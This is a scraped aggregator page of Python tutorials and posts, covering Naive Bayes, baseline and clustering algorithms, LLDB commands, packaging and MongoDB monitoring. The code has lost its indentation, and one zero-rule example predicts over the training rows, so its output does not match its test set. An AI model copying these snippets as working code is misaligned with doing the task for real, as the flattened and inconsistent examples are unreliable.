Quantcast
Channel: CodeSection,代码区,Python开发技术文章_教程 - CodeSec
Viewing all 9596 articles
Browse latest View live

数据挖掘实验2python编写贝叶斯分类器

$
0
0
1. Introduction

本文基于前文说的朴素贝叶斯原理,参考 圣地亚哥州立大学的实验 编写了一个简单的朴素贝叶斯分类器,并利用测试数据进行了测试。

项目地址:

2. 分类器编写 2.1数据说明

采用“adult”数据集,输入文件是adult.data,测试文件是adult.test。数据中一行为一个条目,表示一个人

数据集中的变量

变量名 意义 age 年龄 type_employer 职业类型,个体,政府等等 fnlwgt 该变量将被我们忽略 education 学历 education_num 学历的数字等级(和上一个一样,将被忽略) marital 婚姻状况 occupation 职业 relationship 不清楚如何表述 race 人种 sex 生理性别 capital_gain 资本收益 capital_loss 资本支出 hr_per_week 每周工作时长 country 国籍 income 年收入是否>50k

由于参考文章中使用的是R语言进行处理,R语言在数据挖掘和统计上优势极大,几乎就是为其而生。python中也有numpy库,但是这里仅用了numpy库的median取中位数功能,其他还是以python原生类型来处理。

2.2 框架规划

参考 使用Python编写朴素贝叶斯分类器 ,我们也主要使用字典来实现统计,但是可以分成两个字典,一个是>50k的dataset_high,一个是<=50k的dataset_low。

class DataSet:
def __init__(self):
# 存储读入的原始数据
self.data = []
# 支出的中位数
self.loss_mid = 0
# 收入的中位数
self.gain_mid = 0
# 工作时长的中位数
self.hours_mid = 0
# 年龄的中位数
self.age_mid = 0
# 统计的数据,主要部分
self.classfied_dataset = None
# 总数据条目
self.len_data = 0

最后的计算是前文说的:

最后两者取大者,则就是所建模型的判定,是否大于50k。

公式化简:

由于P(输入数据的特征)对于一条数据,两个公式来说,是相同的,所以略去计算。

2.3 输入数据预处理 a = ["age", "type_employer", "fnlwgt", "education", "education_num", "marital", "occupation", "relationship", "race",
"sex", "capital_gain", "capital_loss", "hr_per_week", "country", "income"]
classfiled_data = {}
loss_median = loss
gain_median = gain
for node in a:
classfiled_data[node] = {}
for line in data:
if len(line) < 10:
continue
for node in a:
if line[a.index(node)] in classfiled_data[node]:
classfiled_data[node][line[a.index(node)]] += 1
else:
classfiled_data[node][line[a.index(node)]] = 1

列表a就是所有的字段,将所有的数据都按照对应字段,统计到classfiled_data上去,最后形成的形式如下:

# 打印classfiled_data的输出,这是已经简化过的输出
{education:
{'Prof-school': 153, 'dropout': 4009, 'Doctorate': 107, 'HS-grad': 8826, 'Bachelors': 3134, 'Assoc': 1823, 'Some-college': 5904, 'Masters': 764},
marital:
{'Widowed': 908, 'Never-married': 10192, 'not-married': 5323, 'Married': 8297},
country:
{'other': 133, 'United-States': 21999, 'British-Commonwealth': 230, 'SE-Asia': 242, 'Euro_1': 159, 'Euro_2': 122, '?': 437, 'South': 64, 'China': 100, 'Latin-America': 1027, 'South-America': 207},
income:
{'<=50K': 24720},
capital_gain:
{'low': 0, 'none': 23685, 'high': 1035},
relationship:
{'Not-in-family': 7449, 'Own-child': 5001, 'Other-relative': 944, 'Husband': 7275, 'Wife': 823, 'Unmarried': 3228},}

即classfiled_data的第一层字段是a里面的字段,每个字段又对应不同类型的子字段,数字是统计所有数据的出现次数。

2.4 字段简化

舍弃没用的 fnlwgt 和重复的 education_num 字段

对于职业类型字段,Never-worked和without-Pay可以合并为Not-working字段,类似的,也可以把其他一些字段进行合并,合并的步骤是先在classfiled_data['type_employer']里新建一个'not-working'的key,然后其value就是原来['Never-worked', 'Without-pay']的数值之和。在写了很长的代码以后,我将其提取出来做成了一个函数: def tiny(a_list, category, new_name):
if new_name not in classfiled_data[category]:
classfiled_data[category][new_name] = 0
for key in list(classfiled_data[category]):
if key in a_list and key != new_name:
classfiled_data[category][new_name] += classfiled_data[category][key]
del classfiled_data[category][key]
tiny(['Never-worked', 'Without-pay'], 'type_employer', 'not-working')
tiny(['Local-gov', 'State-gov'], 'type_employer', 'other-govt')
tiny(['Self-emp-inc', 'Self-emp-not-inc'], 'type_employer', 'self-employed')

同样对其他字段也进行了类似的化简。

这里有这样几个字段需要单独处理:

capital_gain 利用中位数划分成三部分:(-INF, 0] (0, mid] (mid, INF] capital_loss 同上 hr_per_week 工作时间按照10小时间隔划分了。最大值99,映射到100s上 age 按照5为间隔划分了20组, 3. 测试数据

由于前面对数据进行了化简,所以测试数据的输入也需要按照上面的划分进行映射,我代码里直接使用生成好的字典进行映射。

针对每条数据,计算P(输入数据的特征|>50k) 和P(输入数据的特征|<=50k),取大的返回结果。

最后测试结果如下:

模型的判断正确的次数: 13206
错误的次数 3075
正确率: 0.811130

从头开始:用Python实现基线机器学习算法

$
0
0

在预测建模时,确定基线性能(baseline performance)是很重要的。

基线为评估更高级的方法提供了比较的标准。

在本教程中,你将了解如何在 python 中实现基线机器学习算法(Baseline Machine Learning Algorithms)。学完本教程后,你将了解:

如何实现随机预测(random prediction)算法

如何实现零规则(zero rule prediction)算法

让我们开始吧!

描述

可供选择的机器学习算法有很多。事实上,有上百种。那么在选择算法之前,你需要评价它的预测结果。可是,你如何判断结果的好坏?

答案是使用基线预测算法。如其它预测一样,基线预测算法提供了一组可以评估的预测结果,例如分类准确率(Accuracy)或 RMSE。

这些评价指标的数值为评估所有其它机器学习算法提供了所需的比较标准。

一旦计算出基线预测算法的评价指标,就可以知道一个给定算法比朴素基线算法到底好多少,为评价算法提供了依据。

两种最常用的基线算法是:

随机预测(random prediction)算法

零规则(zero rule prediction)算法

当遇到比传统分类或回归问题更棘手的新问题时,一个好的想法是首先设计一个基于该预测问题特征的随机预测算法。之后你可以在此基础上改进,并设计一个零规则算法。

让我们执行这些算法代码,并看看它们是如何工作的吧。

教程

本教程分为两部分:

随机预测算法

零规则算法

对于实施和计算给定机器学习算法的基线性能,下面的步骤将为你提供必要的基础。

1. 随机预测算法

正如在训练数据中观察到的那样,随机预测算法给出随机的预测结果。这可能是机器学习中最简单的算法。

它要求训练集包含所有可能的因变量结果值,对于自变量取值很多的回归问题,这个集合可能非常大。

因为随机数用于预测,所以最佳的方法是在使用算法之前固定随机数种子。这是为了确保我们获得相同的一组随机数,并且每次运行算法时都得到相同的决策。

下面是随机预测算法在名为 random_algorithm() 的函数中的实现。

该函数的输入参数为两部分:含有因变量数值的训练集和需要预测因变量数值的测试集。

该函数将用于分类和回归问题。它假定训练集的预测输出值是每行观测值的最后一列。

首先,从训练集得到所有因变量取值的集合。然后,从集合中随机选择一个值作为测试集每一行观测值的输出值。

# Generate random predictions

def random_algorithm(train, test):

output_values = [row[-1] for row in train]

unique = list(set(output_values))

predicted = list()

for row in test:

index = randrange(len(unique))

predicted.append(unique[index])

return predicted

我们可以用一个小数据集测试这个函数,为了简单起见,它只包含输出列。

训练集的输出值为 0 或 1,意味着算法的预测集合为 {0,1},并从中选择预测值。在预测之前,测试集的输出列为空。

from random import seed

from random import randrange

# Generate random predictions

def random_algorithm(train, test):

output_values = [row[-1] for row in train]

unique = list(set(output_values))

predicted = list()

for row in test:

index = randrange(len(unique))

predicted.append(unique[index])

return predicted

seed(1)

train = [[0], [1], [0], [1], [0], [1]] test = [[None], [None], [None], [None]]

predictions = random_algorithm(train, test)

print(predictions)

运行示例代码,计算测试集的随机预测,并 print 预测结果。

[0, 1, 1, 0]

随机预测算法易于实现且运行速度快,但作为基线算法,我们可以做得更好。

2. 零规则算法

零规则算法是比随机预测算法更好的基线预测算法。对于给定问题,它运用更多相关的信息来建立规则以进行预测。此规则根据问题类型而有所不同。

让我们从分类问题开始,预测每一类的标签。

分类

对于分类问题,一个规则是预测训练集中最常见类的取值。这意味着如果训练集有 90 个类为 0 的实例和 10 个类为 1 的实例,那么输出值将都预测为 0,此时的基线精度为 90/100 或 90%。

这比平均只能达到 82% 准确率的随机预测算法要好得多。如何计算随机预测算法准确率估计值的细节如下:

= ((0.9 * 0.9) + (0.1 * 0.1)) * 100

= 82%

下面是一个基于分类问题的名为 zero_rule_algorithm_classification() 的零规则算法函数。

# zero rule algorithm for classification

def zero_rule_algorithm_classification(train, test):

output_values = [row[-1] for row in train]

prediction = max(set(output_values), key=output_values.count)

predicted = [prediction for i in range(len(test))]

return predicted

该函数使用带有 key 属性的 max() 函数,这是一个聪明的做法。给定训练集中观察到的所有类的取值,max() 函数将通过调用计数函数统计每一类数值的数量,采用数量最多的一组类值。

结果是它返回训练集中观察到的具有最高计数类值的数值。

如果所有类值具有相同的计数,则选择在数据集中观察到的第一个类值。

一旦我们选择好计数最大的类值,它将用于每一行测试集数据的预测。

下面是一个例子,这个构造的数据集包含 4 个类为 0 的实例和 2 个类为 1 的实例。算法将选择类值 0 作为测试集中每一行的预测。

from random import seed

from random import randrange

# zero rule algorithm for classification

def zero_rule_algorithm_classification(train, test):

output_values = [row[-1] for row in train]

prediction = max(set(output_values), key=output_values.count)

predicted = [prediction for i in range(len(train))]

return predicted

seed(1)

train = [['0'], ['0'], ['0'], ['0'], ['1'], ['1']] test = [[None], [None], [None], [None]]

predictions = zero_rule_algorithm_classification(train, test)

print(predictions)

运行此代码将进行预测并将其 print 到屏幕。如预期,类值 0 被选择并用来预测。

['0', '0', '0', '0', '0', '0']

现在,让我们看看回归问题的零规则算法。

回归

回归问题需要预测非离散型值。一个默认的好的预测方法是预测数据的集中趋势(central tendency)。这可以是平均值或中值。使用训练集观察到的因变量的平均值是一个很不错的默认方法。它的误差可能比随机预测低,因为后者将返回任何观察到的因变量值。

下面是一个名为 zero_rule_algorithm_regression()的函数。它的原理是计算观察到的因变量的平均值。

mean = sum(value) / total values

一旦计算出平均值,它将用于每一行训练数据的预测。

from random import randrange

# zero rule algorithm for regression

def zero_rule_algorithm_regression(train, test):

output_values = [row[-1] for row in train]

prediction = sum(output_values) / float(len(output_values))

predicted = [prediction for i in range(len(test))]

return predicted

这个函数可以用一个简单的例子来测试。

我们可以构造一个小数据集,其中平均值已知为 15。

10

15

12

15

18

20

mean = (10 + 15 + 12 + 15 + 18 + 20) / 6

mean = 90 / 6

mean = 15

下面是完整的例子。我们期望 4 行测试集的预测值为平均值 15。

from random import seed

from random import randrange

# zero rule algorithm for regression

def zero_rule_algorithm_regression(train, test):

output_values = [row[-1] for row in train]

prediction = sum(output_values) / float(len(output_values))

predicted = [prediction for i in range(len(test))]

return predicted

seed(1)

train = [[10], [15], [12], [15], [18], [20]] test = [[None], [None], [None], [None]]

predictions = zero_rule_algorithm_regression(train, test)

print(predictions)

运行示例代码,计算测试集的预测值,并 print 预测结果。如预期,每一行测试集的预测值为平均值 15。

[15.0, 15.0, 15.0, 15.0, 15.0, 15.0] 扩展

以下是基线预测算法的一些扩展,你可以自己来实现这些算法。

用中位数值、众数等其它中心趋势统计量预测,而不是平均值

对于时间序列问题,当最后 n 条记录的平均值已经预测出来时,使用滑动平均值(Moving Average)用于预测

回顾

在本教程中,你了解了计算机器学习问题的基线性能的重要性。

你现在知道了:

如何实现分类和回归问题的随机预测算法

如何实现分类和回归问题的零规则算法

相关链接:

从头开始:用Python实现带随机梯度下降的线性回归

从头开始:用Python实现随机森林算法

用Python做科学计算 高清晰PDF

$
0
0

python做科学计算一书介绍如何用Python开发科学计算的应用程序,除了介绍数值计算之外,我们还将着重介绍如何制作交互式的2D、3D图像;如何设计精巧的程序界面;如何和C语言所编写的高速计算程序结合;如何编写声音、图像处理算法。

用Python做科学计算PDF截图:


用Python做科学计算 高清晰PDF
用Python做科学计算 高清晰PDF
用Python做科学计算 高清晰PDF

目录

基础篇

科学计算所用到的各种库的入门介绍

软件包的安装和介绍

安装软件包

函数库介绍

NumPy-快速处理数据

ndarray对象

ufunc运算

矩阵运算

文件存取

SciPy-数值计算库

最小二乘拟合

函数最小值

非线性方程组求解

B-Spline样条曲线

数值积分

解常微分方程组

滤波器设计

用Weave嵌入C语言

SymPy-符号运算好帮手

封面上的经典公式

球体体积

matplotlib-绘制精美的图表

快速绘图

绘制多轴图

配置文件

Artist对象

Traits-为Python添加类型定义

背景

Traits是什么

动态添加Trait属性

Property属性

Trait属性监听

TraitsUI-轻松制作用户界面

缺省界面

自定义界面

配置视图

Chaco-交互式图表

面向脚本绘图

面向应用绘图

TVTK-三维可视化数据

TVTK使用简介

TVTK的改进

Mayavi-更方便的可视化

用mlab快速绘图

Mayavi应用程序

将Mayavi嵌入到界面中

Visual-制作3D演示动画

场景、物体和照相机

简单动画

盒子中反弹的球

OpenCV-图像处理和计算机视觉

读写图像和视频文件

手册篇

各个库的用户使用手册的翻译

Traits使用手册

traits

traits.ui

Visual使用手册

场景窗口

实战篇

用所学到的东西解决实际问题

声音的输入输出

读写Wave文件

用pyAudio播放和录音

用pyMedia播放Mp3

数字信号系统

FIR和IIR滤波器

FIR滤波器设计

IIR滤波器设计

滤波器的频率响应

二次均衡器设计工具

FFT演示程序

FFT知识复习

合成时域信号

三角波FFT演示程序

频域信号处理

观察信号的频谱

快速卷积

Hilbert变换

Ctypes和NumPy

用ctypes加速计算

用ctypes调用DLL

numpy对ctypes的支持

自适应滤波器和NLMS模拟

自适应滤波器简介

NLMS计算公式

NumPy实现

DLL函数的编写

ctypes的python接口

单摆和双摆模拟

单摆模拟

双摆模拟

分形与混沌

Mandelbrot集合

迭代函数系统(IFS)

L-System分形

附录

关于本书的编写

本书的编写工具

问题与解决方案

ReST使用心得

未解决的问题

最近更新

源程序集

PDF文档可以到linux公社资源站下载:

------------------------------------------分割线------------------------------------------

免费下载地址在 http://linux.linuxidc.com/

用户名与密码都是 www.linuxidc.com

具体下载目录在/2017年资料/2月/3日/数据库原理(第5版)PDF+PPT习题资料集合/

下载方法见 http://www.linuxidc.com/Linux/2013-07/87684.htm

------------------------------------------分割线------------------------------------------

本文永久更新链接地址 : http://www.linuxidc.com/Linux/2017-02/140193.htm

Rene Dudfield: python packaging zero - part one

$
0
0

In part zero of this series,

I pontificated on,

" What would python packaging zero look like? "

A zero'd package contains just code(and data). Nothing else.

Code readability is important. Code changeability is important.

These two things have always been a core part of what makes python good. However, the current python packaging world fails on both counts. It's actually pretty damn good overall though (binary wheels for most platforms, a resilient CDN, cached packages, dependency management, enhancement peps are being written, there's now a pypa organisation on github where people collaborate on code together... all good stuff).

However, having 10-40 config files in your repo is not readable , nor easily changeable. Which are the files that matter?

Generating files from a template is not changeable.

Django, rails, cookiecutter, sampleproject - they all generate dozens of files for your project from a template. But when you want to change these files?

Being able to change the name of your package or app is important. Especially for creative coding, where you don't even know what you're making! (I would suggest all the best types of coding are creative and have this factor). If we are going to try and get the game and arts communities to use packages, then no way in hell should we point them at this huge complexity of what the current packaging system is.

i_can_not_think_of_a_name.py

So you start right away on the thing that matters. (hint, that's not packaging, it's your code). Then you eventually figure out you're writing an app to help save the whales from idiots.

savethewhales.py

You just rename the file. That's all you need in the repo . In the normal python packaging way you have to also update the setup.py, and all other sorts of places. Quite possibly causing hours of debugging to happen when something doesn't work later.

What other packaging information can be derived?

Previously I mentioned how other pieces of packaging metadata can be derived. Things like the package name, and the author_email. What else do we need, and where do we get it from?

If there is a " data/ " folder then package that up. This is a convention. If there is a test_savethewhales.py then perhaps run the tests before release. Again, a convention. What does the package depend on? Does it use pygame or click? Add them to the " requirements " inside of setup.py. These can be obtained by "pip freeze ", or by parsing the package imports. Are there command line scripts in the app? Does savethewhales.py have a if __name__ == '__main__' and a main() function? Then lets make a "console_script" in the setup.py which generates the "savethewhales.exe" on windows, and the "savethewhales" script on unix. Can folders be used as well as single file packages?

Yep. Now a folder with a .py file in it is considered a package by python (3.3+). So if we run our tool on a repo that contains a folder with files in it, then that is a package. This is easy to detect.


Rene Dudfield: python packaging zero - part one
punchnazis/trumps.py punchnazis/humans.py punchnazis/main.py data/ Say you have a game where you punch nazis (eg. wolfenstein altright edition ), then the packaging tool can see these files, and make it upload a ' punchnazis ' package for you. So then you can ' python3 -m punchnazis ', or call the script: ' punchnazis '.
Complexity when we need it.

Optimize for simple cases, allow handling the complex cases.

What if this doesn't work for my package? Not all packages will be able to work with this(I would suggest many can however). In these cases, then you are free to add all the extra special cases in your own setup code. At that point start adding all the 20 config files you need. (Have you seen some of the setup.py files in the wild? There's all sorts of special case handling for things that matter for those packages).

We should optimize for these simple use cases, because most of our code should be simple . We use convention, we make good (but opinionated) choices, we derive the information.

A temporary folder where setup.py files are generated for release.

When doing a release, we tag the version in git, and increment.

Generating a temporary folder with all the setup.py files, the MANIFEST.in, the code and data copied in. tox can run the tests. Twine can upload to pypi, docs can be uploaded to readthecode, all that good business.

(If you want to join the discussion on packaging games, please join us on the pygame mailing list).

[ED: I was pointed at these two tools which also show a dislike of lots of packaging boilerplate code... flit https://pypi.python.org/pypi/flit pbr http://docs.openstack.org/developer/pbr/

]

LLDB命令及扩展

$
0
0

列出断点列表

br l

删除断点(2是断点id)

br delete 2

enable断点

br e 2

disable断点

br di 2

设置断点(30是行数)

b ViewController.m:30

设置symbolic断点

br set -n viewDidLoad

设置条件断点

br mod -c "totalValue > 3000" 2

删除条件断点

br mod -c "" 2

在某一个断点处执行多个命令

br com add 2 > bt > continue > DONE

继续执行

continue c

单步执行

n

单步进入

s

退出当前函数

finish expr命令:可以不用修改代码即可以在程序运行时修改程序数据和行为 expo self.view.hidden = YES expr -L ― 5+5 expr (void)NSLog(@“hello world") expr -- (CGRect)[self.view frame] expr int $debugVar = 5 expr NSString *$debugString = @"ezio cham" expr NSData *$data = [$jsonString dataUsingEncoding: 4] //lldb不认识enum,需要传具体的值 backtrace命令 bt bt all thread命令:在排查多线程问题时会用到 thread backtrace thread backtrace all

显示thread列表

thread list

选择id为1的thread

thread select 1

使用thread命令完成断点功能(100是行号)

thread until 100

修改方法返回值(在代码中的return语句所在行执行)

thread return @"new result"

example:

thread until 63(63行是当前方法的return语句所在行) thread return YES frame命令

查看当前frame的变量列表

frame variable

查看当前frame 名为varName的变量的值

frame variable varName frame info

选择id为2的frame

frame select 2

选择当前frame的下一个frame

frame select -relative -1 watchpoint

查看当前watchpoint列表

watchpoint list watchpoint delete 1 watchpoint set variable varName

可以watch expression(my_pointer为expression的返回值)

watchpoint set expression ― my_pointer

设置watchpoint的条件

watchpoint modify -c “_x > 0” 1

删除条件

watchpoint modify -c “” 1 script命令

查看lldb使用的python版本

script print(sys.version)

进入lldb的python环境

script

使用python脚本

breakpoint command add -s python 1

使用python 函数my_script.breakpoint_func

breakpoint command add -F my_script.breakpoint_func 1 command命令

引入python脚本并指定新command命令:cmd_name

command script import “~/my_script.py" command script add -f my_script.python_function cmd_name

引入python脚本并设置在断点中使用

command script import “~/my_script.py" breakpoint command add -F my_script.breakpoint_func 1

引入其他lldb script

command script import “~/my_script.txt"

删除命令pf

command unalias pf

显示命令历史列表(report navigator中有更详细的内容)

command list alias

获取当前所有alias

help -a

获取和关键字相关的alias

apropos break

设置positional alias

command alias sbr breakpoint set -l %1 command alias pf expr (CGRect)[self.view frame]

设置regular alias

command regex sbr ’s/(\[0-9\]+)/breakpoint set -l %1' command regex pf s/(.+)/expr (CGRect)[%1 frame]/ s/^$/expr (CGRect)[self.view frame]/

持久化alias

创建~/.lldbinit文件 ,添加以下内容:

command regex pf ‘s/(.+)/expr (CGRect)[%1 frame]/’ ‘s/^$/expr (CGRect)[self.view frame]/’ custom summary type summary add CGRect -s "width = ${var.size.width}, height = ${var.size.height}"

为SavingsAccount设置summary

command script import ~/account.py type summary add -F account.count_summary SavingsAccount

删除

type summary delete CGRect

过滤,只显示firstName属性

type filter add SavingsAccount ―child _firstName

改变显示格式

typedef int hex_month type format add ―format hex hex_month quicklook

quicklook in lldb

https://github.com/ryanolsonk/LLDB-QuickLook

quicklook in xcode

http://nshipster.com/quick-look-debugging/ 扩展LLDB命令

lldb的python接口文档

http://lldb.llvm.org/python_reference/index.html chisel:Facebook的LLDB扩展 border self.view border --color green self.view

让view透明

mask self.button

让view从透明状态恢复

unmask self.button

打印当前界面的layer tree

pca

打印当前界面的view 层级

pviews

打印view的responder chain

presponder self.view

交互式查看view的层级树

vs self.view

重绘当前界面

caflush

快速闪烁view

flicker self.view

显示view

show self.view

隐藏view

hide self.view

打印class的继承树

pclass self.property

截屏预览

visualize self.view

Restricting uploads to public PyPI

$
0
0

Many companies use an internal PyPI server for storing their proprietary python packages. This makes managing python libraries and application dependencies so much easier. But unfortunately this also makes it easy for people to accidentally upload their private code to the public PyPI unintentionally.

Lucky for us, there’s a cool extension to setuptools called restricted_pkg ! Unlucky for us,it leaves something to be desired in terms of user experience. Let’s say we have an example library called xl which uses restricted_pkg to prevent accidental uploads.Building on the usage given in restricted_pkg ‘s docs,our setup.py willgo like this:

from setuptools import find_packages from restricted_pkg import setup setup(name='xl', version='0.1.0', packages=['xl'], private_repository="https://pypi.example.com", install_requires=[ "distribute", "restricted_pkg", ], )

So far so good. But when we try to pip install that in a clean virtualenv, its going to fail.

$ pip install -e xl/ Obtaining file:///Users/codyaray/xl Complete output from command python setup.py egg_info: Traceback (most recent call last): File "", line 20, in File "/Users/codyaray/xl/setup.py", line 2, in from restricted_pkg import setup ImportError: No module named restricted_pkg ---------------------------------------- Command "python setup.py egg_info" failed with error code 1 in /Users/codyaray/xl

That makes us sad. Why must restricted_pkg make our users do more work? No!

The workaround I’ve developed is to check whether restricted_pkg is already installed and auto-install it if its missing.Since this is a standard python import, we can’t really rely on setuptools magic. Thesimplest most concise way I’ve found so far is to wrap the import in a try/catch and programmatically invoke pip (in a hacky abusive way).

try: from restricted_pkg import setup except ImportError: import pip pip.main(['install', 'restricted_pkg']) from restricted_pkg import setup setup(name='xl', version='0.1.0', packages=['xl'], private_repository='https://pypi.example.com')

Its a minimum of boilerplate, very comprehensible, and gets the job done.

K-Means & Other Clustering Algorithms: A Quick Intro with Python

$
0
0

This post was originally published here

Clustering is the grouping of objects together so that objects belonging in the same group (cluster) are more similar to each other than those in other groups (clusters). In this intro cluster analysis tutorial, we’ll check out a few algorithms in python so you can get abasic understanding of the fundamentals of clustering on a real dataset.

The Dataset

For the clustering problem, we will use the famous Zachary’s Karate Club dataset. The story behind the data set is quite simple: There was a Karate Club that had an administrator “John A” and an instructor “Mr. Hi” (both pseudonyms). Then a conflict arose between them, causing the students (Nodes) to split into two groups. One that followed John and one that followed Mr. Hi.


K-Means &amp; Other Clustering Algorithms: A Quick Intro with Python
Source: Wikipedia Getting Started with Clustering in Python

But enough with the introductory talk, let’s get to main reason you are here, the code itself. First of all, you need to install both scikit-learn and networkx libraries to complete this tutorial. If you don’t know how, the links above should help you. Also, feel free to follow along by grabbing the source code for this tutorial over on Github .

Usually, the datasets that we want to examine are available in text form (JSON, Excel, simple txt file, etc.) but in our case, networkx provide it for us. Also, to compare our algorithms, we want the truth about the members (who followed whom) which unfortunately is not provided. But with these two lines of code, you will be able to load the data and store the truth (from now on we will refer it as ground truth):

# Load and Store both data and groundtruth of Zachary's Karate Club
G = nx.karate_club_graph()
groundTruth = [0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1,1]

The final step of the data preprocessing, is to transform the graph into a matrix (desirable input for our algorithms). This is also quite simple:

def graphToEdgeMatrix(G):
# Initialize Edge Matrix
edgeMat = [[0 for x in range(len(G))] for y in range(len(G))]
# For loop to set 0 or 1 ( diagonal elements are set to 1)
for node in G:
tempNeighList = G.neighbors(node)
for neighbor in tempNeighList:
edgeMat[node][neighbor] = 1
edgeMat[node][node] = 1
return edgeMat

Before we get going with the Clustering Techniques, I would like you to get a visualization on our data. So, let’s compile a simple function to do that:

def drawCommunities(G, partition, pos):
# G is graph in networkx form
# Partition is a dict containing info on clusters
# Pos is base on networkx spring layout (nx.spring_layout(G))
# For separating communities colors
dictList = defaultdict(list)
nodelist = []
for node, com in partition.items():
dictList[com].append(node)
# Get size of Communities
size = len(set(partition.values()))
# For loop to assign communities colors
for i in range(size):
amplifier = i % 3
multi = (i / 3) * 0.3
red = green = blue = 0
if amplifier == 0:
red = 0.1 + multi
elif amplifier == 1:
green = 0.1 + multi
else:
blue = 0.1 + multi
# Draw Nodes
nx.draw_networkx_nodes(G, pos,
nodelist=dictList[i],
node_color=[0.0 + red, 0.0 + green, 0.0 + blue],
node_size=500,
alpha=0.8)
# Draw edges and final plot
plt.title("Zachary's Karate Club")
nx.draw_networkx_edges(G, pos, alpha=0.5)

What that function does is to simply extract the number of clusters that are in our result and then assign a different color to each of them (up to 10 for the given time is fine) before plotting them.


K-Means &amp; Other Clustering Algorithms: A Quick Intro with Python
Clustering Algorithms

Some clustering algorithms will cluster your data quite nicely and others will end up failing to do so. That is one of the main reasons why clustering is such a difficult problem. But don’t worry, we won’t let you drown in an ocean of choices. We’ll go through a few algorithms that are known to perform very well.

K-Means Clustering

N (the number of node):

K (the number of cluster):

Source: github.com/nitoyon/tech.nitoyon.com

K-means is considered by many the gold standard when it comes to clustering due to its simplicity and performance, and it’s the first one we’ll try out. When you have no idea at all what algorithm to use, K-means is usually the first choice. Bear in mind that K-means might under-perform sometimes due to its concept: spherical clusters that are separable in a way so that the mean value converges towards the cluster center. To simply construct and train a K-means model, use the follow lines:

# K-means Clustering Model
kmeans = cluster.KMeans(n_clusters=kClusters, n_init=200)
kmeans.fit(edgeMat)
# Transform our data to list form and store them in results list
results.append(list(kmeans.labels_)) Agglomerative Clustering

The main idea behind agglomerative clustering is that each node starts in its own cluster, and recursively merges with the pair of clusters that minimally increases a given linkage distance. The main advantage of agglomerative clustering (and hierarchical clustering in general) is that you don’t need to specify the number of clusters. That of course, comes with a price: performance. But, in scikit’s implementation, you can specify the number of clusters to assist the algorithm’s performance. To create and train an agglomerative model use the following code:

# Agglomerative Clustering Model
agglomerative = cluster.AgglomerativeClustering(n_clusters=kClusters, linkage="ward")
agglomerative.fit(edgeMat)
# Transform our data to list form and store them in results list
results.append(list(agglomerative.labels_)) Spectral

The Spectral clustering technique applies clustering to a projection of the normalized Laplacian. When it comes to image clustering, spectral clustering works quite well. See the next few lines of Python for all the magic:

# Spectral Clustering Model
spectral = cluster.SpectralClustering(n_clusters=kClusters, affinity="precomputed", n_init= 200)
spectral.fit(edgeMat)
# Transform our data to list form and store them in results list
results.append(list(spectral.labels_)) Affinity Propagation Well this one is a bit different. Unlike the previous algorithms, you can see AF does not require the number of clusters to be determined before running the algorithm. AF, performs really well on several computer vision and biology problems,

Monitoring MongoDB Driver Events In Motor

$
0
0

Monitoring MongoDB Driver Events In Motor

Do you want to know every MongoDB query or command your program sends, and the server’s reply to each? How about getting a notification whenever the driver detects a primary failover, or when a new secondary joins the replica set? Over the last year, MongoDB drivers have implemented these monitoring features in all our supported programming languages. Here’s how to use monitoring in Motor, my python async driver.

Motor wraps PyMongo, and it shares PyMongo’s API for monitoring. To receive notifications about events, you subclass one of PyMongo’s four listener classes, CommandListener , ServerListener , TopologyListener , or ServerHeartbeatListener . Let’s subclass CommandListener, so we’re notified whenever a command starts, succeeds, or fails.

import logging from pymongo import monitoring class MyCommandLogger(monitoring.CommandListener): def started(self, event): logging.info("Command {0.command_name} with request id " "{0.request_id} started on server " "{0.connection_id}".format(event)) def succeeded(self, event): logging.info("Command {0.command_name} with request id " "{0.request_id} on server {0.connection_id} " "succeeded in {0.duration_micros} " "microseconds".format(event)) def failed(self, event): logging.info("Command {0.command_name} with request id " "{0.request_id} on server {0.connection_id} " "failed in {0.duration_micros} " "microseconds".format(event))

Register an instance of MyCommandLogger :

monitoring.register(MyCommandLogger())

You can register any number of listeners, of any of the four listener types.

We only need to use PyMongo’s API here, but if you create a MotorClient its commands are monitored, the same as a PyMongo MongoClient .

import sys from tornado import ioloop, options, gen from motor import MotorClient logging.basicConfig(stream=sys.stdout, level=logging.INFO) client = MotorClient() async def do_insert(): await client.test.collection.insert({'_id': 1, 'message': 'hi!'}) ioloop.IOLoop.current().run_sync(do_insert)

Watch out: PyMongo publishes notifications from a background thread, so your listeners’ callbacks are executed on that thread, not the main thread. If you want to interact with Tornado or Motor from a listener, you must defer to the main thread using IOLoop.add_callback , which is the only thread-safe IOLoop method. Similarly, if you’re using asyncio instead of Tornado, get to the main loop with call_soon_threadsafe . I can’t think of a need for you to do this, though―it seems like logging is the only reasonable thing to do from a listener, and the Python logging module is thread-safe .

For more info, see:

A complete example with Motor PyMongo’s monitoring API The Command Monitoring Spec for all MongoDB Drivers The Topology Monitoring Spec for all MongoDB Drivers

That was simple, so we have time for a picture of a monitor lizard and a log:


Monitoring MongoDB Driver Events In Motor

Images:


A Simple Trending Products Recommendation Engine in Python

$
0
0

Our product recommendations were boring. I knew that because our customers told us. When surveyed, the #1 thing they wanted from us was better product discovery. And looking at the analytics data, I could see customers clicking through page after page of recommendations, looking for something new to buy. We weren't doing a good job surfacing the back half of our catalog. There was no serendipity.

One common way of increasing exposure to the long tail of products is by simply jittering the results at random. But injecting randomness has two issues: first, you need an awful lot of it to get products deep in the catalog to bubble up, and second, it breaks the framing of the recommendations and makes them less credible in the eyes of your customers.

What do I mean by 'framing'? Let's look at a famous example from Yahoo!

The Britney Spears Effect.

Let's say you're reading about this weekend's upcoming NFL game. Underneath that article are a bunch of additional articles, recommended for you by an algorithm. In the early 2000s, it turned out just about everyone wanted to read about Britney Spears, whether they would admit it or not.

So you get to the bottom of your Super Bowl game preview and it says "You might also like:" and then shows you an article about Britney and K-fed. You feel kind of insulted by the algorithm. Yahoo! thinks I want to read about Britney Spears??

But instead, what if said "Other people who read this article read:". Now...huh...ok - I'll click. The framing gives me permission to click. This stuff matters!

Just like a good catcher can frame a on-the-margin baseball pitch for an umpire, showing product recommendations on a website in the right context puts customers in the right mood to buy or click.

"Recommended for you" -- ugh. So the website thinks it knows me, eh? How about this instead:

"Households like yours frequently buy"

Now I have context. Now I understand. This isn't a retailer shoving products in front of my face, it's a helpful assemblage of products that customers just like me found useful. Chock-full of social proof!

Finding Some Plausible Serendipity

